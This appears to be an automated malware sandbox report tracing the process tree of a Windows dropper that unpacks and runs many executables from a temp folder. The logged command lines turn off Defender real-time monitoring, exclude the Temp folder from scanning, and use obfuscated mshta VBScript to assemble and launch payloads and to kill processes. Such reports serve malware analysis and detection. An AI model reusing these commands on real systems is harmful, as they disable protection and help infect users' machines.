Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1740 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1740 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1740 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3308 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe
PID 3308 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe
PID 3308 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe
PID 3324 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3500 wrote to memory of 5064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3500 wrote to memory of 5064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3500 wrote to memory of 5064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3700 wrote to memory of 4916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3700 wrote to memory of 4916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3700 wrote to memory of 4916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3324 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 744 wrote to memory of 3196 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14f1396dfcf191bd.exe
PID 744 wrote to memory of 3196 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14f1396dfcf191bd.exe
PID 3324 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3872 wrote to memory of 2664 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe
PID 3872 wrote to memory of 2664 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe
PID 3872 wrote to memory of 2664 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe
PID 3020 wrote to memory of 3788 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1487ca754e680f91.exe
PID 3020 wrote to memory of 3788 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1487ca754e680f91.exe
PID 3020 wrote to memory of 3788 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1487ca754e680f91.exe
PID 4036 wrote to memory of 4508 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14d32a38896785b13.exe
PID 4036 wrote to memory of 4508 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14d32a38896785b13.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe

"C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14514904a4b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14f1396dfcf191bd.exe

Sat14f1396dfcf191bd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe

Sat142b09ae40c44cf.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14d32a38896785b13.exe

Sat14d32a38896785b13.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14514904a4b.exe

Sat14514904a4b.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe

Sat14febbc433.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142ac5249376e895.exe

Sat142ac5249376e895.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1487ca754e680f91.exe

Sat1487ca754e680f91.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat144474a564d26f29.exe

Sat144474a564d26f29.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe

Sat14b47e86b9c16b.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1427fbafcf251.exe

Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1481f5a7e3eccdd.exe

Sat1481f5a7e3eccdd.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14a7594cc5a0116.exe

Sat14a7594cc5a0116.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3324 -ip 3324

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 596

C:\Users\Admin\AppData\Local\Temp\is-Q0LEB.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-Q0LEB.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$701EC,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1481f5a7e3eccdd.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4808 -ip 4808

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1760 -ip 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4808 -s 356

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If """" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 620

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1481f5a7e3eccdd.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\is-77CHV.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-77CHV.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$70114,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "" == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe" ) do taskkill -iM "%~NXf" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1760 -ip 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 620

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE

JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1760 -ip 1760

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Sat142b09ae40c44cf.exe" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 640

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If ""/p~P_UpSUZjMkOKsY "" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1760 -ip 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 788

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "/p~P_UpSUZjMkOKsY " == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" ) do taskkill -iM "%~NXf" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1760 -ip 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 756

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCriPT: CLOSe (CReAteoBject ( "wSCRiPt.SHeLL" ). Run ( "CmD.exE /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = ""MZ"" >PajLCM.4 & CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7 " , 0 , truE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = "MZ" >PajLCM.4& CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ecHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>PajLCM.4"

C:\Windows\SysWOW64\msiexec.exe

msiexec -y .\2KSA.GF7

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7fffdd1fcc40,0x7fffdd1fcc4c,0x7fffdd1fcc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1724,i,17630423203768120228,7370742622864521412,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1892 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

